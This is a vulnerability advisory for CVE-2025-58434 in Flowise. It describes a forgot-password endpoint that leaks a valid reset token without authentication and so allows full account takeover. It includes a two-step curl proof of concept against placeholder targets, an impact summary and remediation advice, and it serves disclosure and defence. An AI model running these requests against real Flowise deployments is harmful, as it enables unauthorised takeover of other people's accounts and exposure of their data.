
CVE-2025-58434

Summary

The forgot-password endpoint in Flowise returns sensitive information including a valid password reset tempToken without authentication or verification. This enables any attacker to generate a reset token for arbitrary users and directly reset their password, leading to a complete account takeover (ATO).

This vulnerability applies to both the cloud service (cloud.flowiseai.com) and self-hosted/local Flowise deployments that expose the same API.

CVSS v3.1 Base Score: 9.8 (Critical)
Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H


Details

  • The endpoint /api/v1/account/forgot-password accepts an email address as input.

  • Instead of only sending a reset email, the API responds directly with sensitive user details, including:

    • User ID, name, email, hashed credential, status, timestamps.
    • A valid tempToken and its expiry, which is intended for password reset.
  • This tempToken can then be reused immediately in the /api/v1/account/reset-password endpoint to reset the password of the targeted account without any email verification or user interaction.

  • Exploitation requires only the victim’s email address, which is often guessable or discoverable.

  • Because the vulnerable endpoints exist in both Flowise Cloud and local/self-hosted deployments, any exposed instance is vulnerable to account takeover.

This effectively allows any unauthenticated attacker to take over arbitrary accounts (including admin or privileged accounts) by requesting a reset for their email.


PoC

  1. Request a reset token for the victim

curl -i -X POST https://<target>/api/v1/account/forgot-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>"}}'

Response (201 Created):

{
  "user": {
    "id": "<redacted-uuid>",
    "name": "<redacted>",
    "email": "<victim@example.com>",
    "credential": "<redacted-hash>",
    "tempToken": "<redacted-tempToken>",
    "tokenExpiry": "2025-08-19T13:00:33.834Z",
    "status": "active"
  }
}

  2. Use the exposed tempToken to reset the password

curl -i -X POST https://<target>/api/v1/account/reset-password \
  -H "Content-Type: application/json" \
  -d '{"user":{"email":"<victim@example.com>","tempToken":"<redacted-tempToken>","password":"NewSecurePassword123!"}}'

Expected Result: 200 OK

The victim’s account password is reset, allowing full login.


Impact

  • Type: Authentication bypass / Insecure direct object exposure.

  • Impact:

    • Any account (including administrator or high-value accounts) can be reset and taken over with only the email address.
    • Applies to both Flowise Cloud and locally hosted/self-managed deployments.
    • Leads to full account takeover, data exposure, impersonation, and possible control over organizational assets.
    • High likelihood of exploitation since no prior access or user interaction is required.

Recommendations

  • Do not return reset tokens or sensitive account details in API responses. Tokens must only be delivered securely via the registered email channel.
  • Ensure forgot-password responds with a generic success message regardless of input, to avoid user enumeration.
  • Require strong validation of the tempToken (e.g., single-use, short expiry, tied to request origin, validated against email delivery).
  • Apply the same fixes to both cloud and self-hosted/local deployments.
  • Log and monitor password reset requests for suspicious activity.
  • Consider multi-factor verification for sensitive accounts.

Credit


⚠️ This is a Critical ATO vulnerability because it allows attackers to compromise any account with only knowledge of an email address, and it applies to all deployment models (cloud and local).
